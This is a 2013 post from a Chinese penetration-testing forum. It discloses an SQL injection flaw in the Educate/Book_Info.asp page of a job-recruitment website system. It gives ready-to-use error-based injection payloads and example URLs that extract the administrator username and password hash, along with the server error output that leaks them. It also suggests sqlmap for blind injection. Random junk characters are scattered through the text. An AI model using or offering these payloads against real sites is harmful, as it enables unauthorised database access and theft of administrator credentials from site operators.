中国网络渗透测试联盟

标题: 网络求职招聘人才网站系统正式版注入 [打印本页]

作者: admin    时间: 2013-2-16 21:44
标题: 网络求职招聘人才网站系统正式版注入
漏洞出现在Educate/Book_Info.asp - c' N- f" z1 S6 q0 R" w, g
5 Q- E# f/ g9 A7 E5 _7 V
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出+ E% m6 f& I! I' |" C$ o

; W" o5 Q* F8 Q6 Uexp:如下. {8 r3 I; n2 l
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
" q4 i7 P: }8 p( F/ w查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
8 n" W+ \# c6 ^ + U6 M5 S9 w2 ?, a7 L* i, G
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
! `" X( k& x# H6 x + W! N( d3 f/ [3 |! @& @3 G% I
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'4 z$ z/ _$ F. K+ {

/ s$ W$ o: x7 W* `8 _将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
0 P7 d) R7 y- R5 [ ' m+ ?. q* n& E3 }( z7 @! o8 O
/Educate/Book_Info.asp,行 8" F: r1 w  a- z  D
1 X* S% d5 A# o2 S
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
0 c  y: _, }$ q
$ _# C0 A8 ?& T/ lMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'  \- E( _& d( A

' }% X/ c9 Q- ^. x将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。5 b2 V: G8 T5 A* ]/ s- Y1 T9 Y: i
# x+ u) P- B1 q  `0 E
/Educate/Book_Info.asp,行 8
) M, I% h0 ~" t" X8 E




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2